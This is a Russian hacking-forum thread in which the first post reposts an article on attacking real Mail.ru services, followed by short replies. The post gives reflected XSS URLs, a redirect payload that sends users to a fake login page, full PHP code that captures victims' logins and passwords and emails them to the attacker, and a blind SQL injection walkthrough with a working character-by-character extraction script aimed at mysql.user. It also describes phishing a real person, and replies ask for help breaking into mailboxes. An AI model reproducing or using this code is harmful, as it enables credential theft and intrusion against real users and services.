<<<***Бесплатная раздача ICQ Видео, музыка...***>>> Сделать стартовой | Добавить в избранное  

[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]

ID5

  • Страница 1 из 1
  • 1
Модератор форума: Пулемёт  
.::Pro100WArezz::. -<<FoRuM>> » -=Internet=- » Хакерство » Взлом Mail.ru Видео
Взлом Mail.ru Видео
MIFONДата: Среда, 27.02.2008, 22:09 | Сообщение # 1
ДруГ Про100 Гения
Группа: Администратор
Сообщений: 108
ICQ 399000029
Репутация: 3
Статус: :-(
Кто хочет посмотреть взлом почты mail.ru,
то вот
взлом mail.ru
2Mb

А теперь решайте стоит там хронить свою корреспонденцию. :yu:Так что в ближайшие два три дня можно взламывать.

Вся информация предоставлена только для ознакомления. Автор темы не несёт никакой ответственности за ущерб или что-либо ещё, вызванное её использованием. Некоторые статьи взяты с разных уголков Интернета, и соответственно, все права принадлежат их авторам

Взлом почты на www.mail.ru 3 или непобедимых не бывает
Исследовав почтовый сервис я так ничего и не нашел. Что же, поищем через гугль. Так как у мэйла есть много других сервисов помимо почтового, в строке запроса я написал: site:*mail.ru. В ответ гугль вывалил 20 страниц урлов (к счастью половина была повторных, иначе я бы лежал в психушке ). Я налил себе кофе и начал проверять сервисы. Web-кодеры mail.ru хорошо поработали, так как после 2-х часового аудита не было найдено ни одной уязвимости. На данный момент были учтены некоторые глюки сервиса 7ya.mail.ru, при просмотре картинок выскакивало popup окно, запомнив адрес:

CODE http://7ya.mail.ru/image.php?in=phot...=500&big_h=375
Я решил его подкорректировать, получилось вот что:

CODE http://7ya.mail.ru/image.php?in= "><font color=ORANGE size=10>Russian Net Hunters - Rulezzz</font>

Как видишь получилось - Russian Net Hunters Rulezzz. Одним из последних сервисов был форумы@mail.ru, я попробовал скуль-инжекшн через форму авторизации, но меня редиретнуло на страницу, в которой говорилось, что я не зарегистрирован, и тут мое внимание привлекла адресная строка:
CODE http://talk.mail.ru/login.html?target=

Я решил проверить переменную target на XSS, набрав в адресной строке
CODE http://talk.mail.ru/login.html?target= "><script>alert();</script>

Я очень удивился и обрадовался, потому что выскочило окошко, которое означало одно - target никак не фильтруется. Было решено создать фэйк страницу авторизации, чтобы наивные юзеры сами присылали мне пароль. Было уже 5 часов утра, даже после 5 кружек кофе хотелось спать (а еще больше хотелось в туалет ). Поэтому я попросил своего хорошего знакомого pixcher'a продолжить начатое мною дело.
next day..

составлен ядовитый URLCODE http://talk.mail.ru/login.html?target= "><script>location.href='Переадресацию на нашу фэйк форму'</script>
В таком виде этот урл сильно палился, поэтому мы немного замаскировали его, чтобы юзеры чувствовали себя сухо и комфортно . В итоге урл принял такой вид:
http://talk.mail.ru/login.html?targe...72%69%70%74%3e

Далее был написан небольшой сниффер, который принимал переданные значения, записывал их в файл и перекидывал юзера к себе на почту, вот код сниффера:
CODE<?
$adminmail = "mymail@mail.ru";
function email($to,$mailtext) {
mail($to,'password',$mailtext,$adminmail);
}
$text="[".date("d.m.y H:i")."]Login: $_POST[login] Password: $_POST[pass]\r\n";
email($adminmail,$text);
$file = fopen("logs.txt","a");
flock($file,3);
fputs($file, $text);
flock($file,1);
fclose($file);

echo "<FORM id='auth' action='http://talk.mail.ru/login.html' method=post>
<INPUT type=hidden name=login value='$_POST[login]'>
<INPUT type=hidden name=pass value='$_POST[pass]'>
<script>auth.submit();</script>
</FORM>";
?>

Обратите внимание, как юзер попадает к себе на почту (строка 17):
<script>auth.submit();</script>
Создание фэйка - это совсем не сложно, сохраняем пагу к себе на винт и редактируем параметр action тега form. В итоге данные, которые ввел юзер, запишутся к тебе в файл и произойдет редирект, удивленный юзер решит, что произошли какие-нить сбои в работе службы DNS

Для проверки всего сказанного я написал "жалостливое" письмо своей новой подружке от бедных админов support@mail.ru c просьбой кликнуть по ссылке... и вскоре в файле logs.txt появилась новая строчка... На следующий день pixcher нашел sql-inj:

http://mobile.mail.ru/catalog/catalog_mp3....inger_id=9'

Ошибка выполнения запроса!
CODE SELECT COUNT(DISTINCT cc.content_id) FROM cache_content as cc, cache_content_region as r, cache_content_num as n WHERE cc.content_group = 'melody' AND cc.content_type = 'melody_mp3' AND r.content_id = cc.content_id AND n.content_id = cc.content_id AND r.region_id = '9' AND n.model_id = 0 AND singer_id = '9''

You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''9''' at line 1

Я не поверил своим глазам, но после нажатия на кнопку REFRESH баг не исчез =) Запрос к БД на число мелодий по введённым критериям совсем не фильтровался на спецсимволы!!! Абсолютно!!! Моя радость увеличилась, когда я заметил, что запрос
http://mobile.mail.ru/catalog/catalog_mp3....inger_id=9' or 1=1/*

выполняется и выдаёт нам кучу мелодий на скачивание, а запрос

http://mobile.mail.ru/catalog/catalog_mp3....inger_id=9' or 1=2/*

выдаёт 0 => никакого списка рингтонов не отображает =), а это значит то, что можно посимвольно брутить поля базы данных! Для начало попробуем сбрутить имя пользователя БД user(). SQL функция substring(user(),1,1) выдёргивает из строки user() первый символ, а функция lower(substring(user(),1,1)) ещё и переводит его в нижний регистр. Запрос

http://mobile.mail.ru/catalog/catalog_mp3....inger_id=9' AND lower(substring(user(),1,1))="a"/*

не выдал ни одного рингтона - а значит первая буква пользователя БД не "a" =(. Первый символ я подобрал вручную, запрос

http://mobile.mail.ru/catalog/catalog_mp3....inger_id=9' AND lower(substring(user(),1,1))="i"/*

выдавал мне полный перечень музона и я понял, что для облегчения этого беспонтового ручного перебора нужно писать скрипт... Наш скрипт должен скачивать страницу, меняя в запросе ="a" на остальные символы английского алфавита и если в теле скаченной страницы присутствует наш список мелодий (практическим путём было выяснено, что такая страница содержит волшебное число 17107 ), то скрипт должен показать нам этот символ и перейти к поиску второго символа, то есть выполняя запросы, содержащие substring(user(),2,1) и т.д. Не долго думая я запусти блокнот и начал вбивать в него до боли знакомые строки любимого PHP. У меня получилось примерно так:

CODE <?
# Скрипт для посимвольного брута полей БД by pixcher (http://runthes.ru)
set_time_limit(0); // пусть наш скрипт не обламывается, если перебор затягивается на длительное
время
$find="user()";# Искомая строка (здесь может быть любое поле БД в виде подзапроса)
$bruteline ='qwertyuiopasdfghjklzxcvbnm1234567890_+!@#\$%^&*\ '"()';# Предполагаем, что исходная
строка состоит только из этих символов
$k=1;# Номер символа, который мы брутим (изначально первый =))
# Далее идёт функция для скачивания веб странички, адрес которой передаётся ей в параметре
function get_page ($link){
$url = parse_url ($link);
$scr = $url['path'];
$scr .= ($url['query'] > "")?"?".$url['query']:"";
$scr .= ($url['fragment'] > "")?"#".$url['fragment']:"";
$host .= $url['host'];
$port = ($url['port'] > "")?$url['port']:80;
$sock = fsockopen ($host, $port);
fputs ($sock, "GET /$scr HTTP/1.0\r\nHost: $host\r\n\r\n");
$cont = "";
while (!feof ($sock)) { $cont .= fgets ($sock); }
fclose ($sock);
return $cont;
}

for ($i=0;$i<strlen($bruteline);$i++){ # запускаем цикл для всех наших символов
$link="http://mobile.mail.ru/catalog/catalog_mp3.php?singer_id=9'%20AND%20lower(substri ng($find,$k,1))=\"$bruteline[$i]\"/*";# Динамически изменяющийся запрос =)
$page=get_page($link);# Скачиваем страницу
if(strstr($page, "17107")){ # ...и если она содержит магическое число 17107...
echo "$bruteline[$i]"; # ...показываем найденный символ...
$i=0; # ...начинаем перебор заново...
$k++; # ...но для следующего символа
}}
?>

Запускаем наш скрипт и... видим имя пользователя БД: "inform@yavanna.mtu". Попробуем вместо $find="user()"; перебирать результаты подзапроса, например

$find="(SELECT password from mysql.user LIMIT 1)";

Запускаем скрипт, но он выдаёт... эх... подзапросы к сожалению не поддерживаются в почтовой БД =( Ничего страшного, UNION SELECT ещё никто не отменял, так что возможен такой перебор:

http://mobile.mail.ru/catalog/catalog_mp3....nger_id=-9' UNION SELECT 1 FROM mysql.user where user="inform" and lower(substring(password,1,1))="a"

Как видите, даже раскрученный проект имеет ошибки. Хочу заметить, что это не единственная ошибка на mail, так что ищи и удачи тебе!

Вся инфа была взята с сайта http://www.winhack.ru/, сайт про вирусы ,взлом, проги для злома.и все остальное

Автор: bagasik


 
Реклама

Скажи спасибо - кликни на любую ссылку
KronДата: Понедельник, 19.05.2008, 22:45 | Сообщение # 2
Новичёк
Группа: Новичек
Сообщений: 1
Репутация: 0
Статус: :-(
Довольно интерестно но долго))
 
Реклама

Скажи спасибо - кликни на любую ссылку
graf07Дата: Среда, 28.05.2008, 20:32 | Сообщение # 3
Новичёк
Группа: Новичек
Сообщений: 6
Репутация: 0
Статус: :-(
а почту маил можешь?
 
Реклама

Скажи спасибо - кликни на любую ссылку
iceeДата: Суббота, 23.08.2008, 21:37 | Сообщение # 4
Новичёк
Группа: Продвинутый
Сообщений: 8
Репутация: 0
Статус: :-(
занятное видеоо
 
Реклама

Скажи спасибо - кликни на любую ссылку
go@dДата: Суббота, 23.08.2008, 21:40 | Сообщение # 5
Новичёк
Группа: Продвинутый
Сообщений: 10
ICQ 417359812
Репутация: 0
Статус: :-(
Ето старый способ вроде как не оригинальный dry

PRO :)
 
Реклама

Скажи спасибо - кликни на любую ссылку
kawsДата: Среда, 24.09.2008, 21:16 | Сообщение # 6
Новичёк
Группа: Продвинутый
Сообщений: 15
Репутация: 0
Статус: :-(
а мне понравился способ! cool

Добавлено (24.09.2008, 21:16)
---------------------------------------------
я бы хотел почту маила попробывать взломать ну как?!?

 
Реклама

Скажи спасибо - кликни на любую ссылку
VOVKTДата: Пятница, 07.11.2008, 10:30 | Сообщение # 7
Новичёк
Группа: Новичек
Сообщений: 15
Репутация: 0
Статус: :-(
фейк рулит)
 
Реклама

Скажи спасибо - кликни на любую ссылку
ImpoolsДата: Воскресенье, 11.10.2009, 00:06 | Сообщение # 8
Новичёк
Группа: Продвинутый
Сообщений: 16
Репутация: 0
Статус: :-(
а взлом яндекса имеется?)
 
Реклама

Скажи спасибо - кликни на любую ссылку
.::Pro100WArezz::. -<<FoRuM>> » -=Internet=- » Хакерство » Взлом Mail.ru Видео
  • Страница 1 из 1
  • 1
Поиск:
Статистика
Сегодня сайт посетили: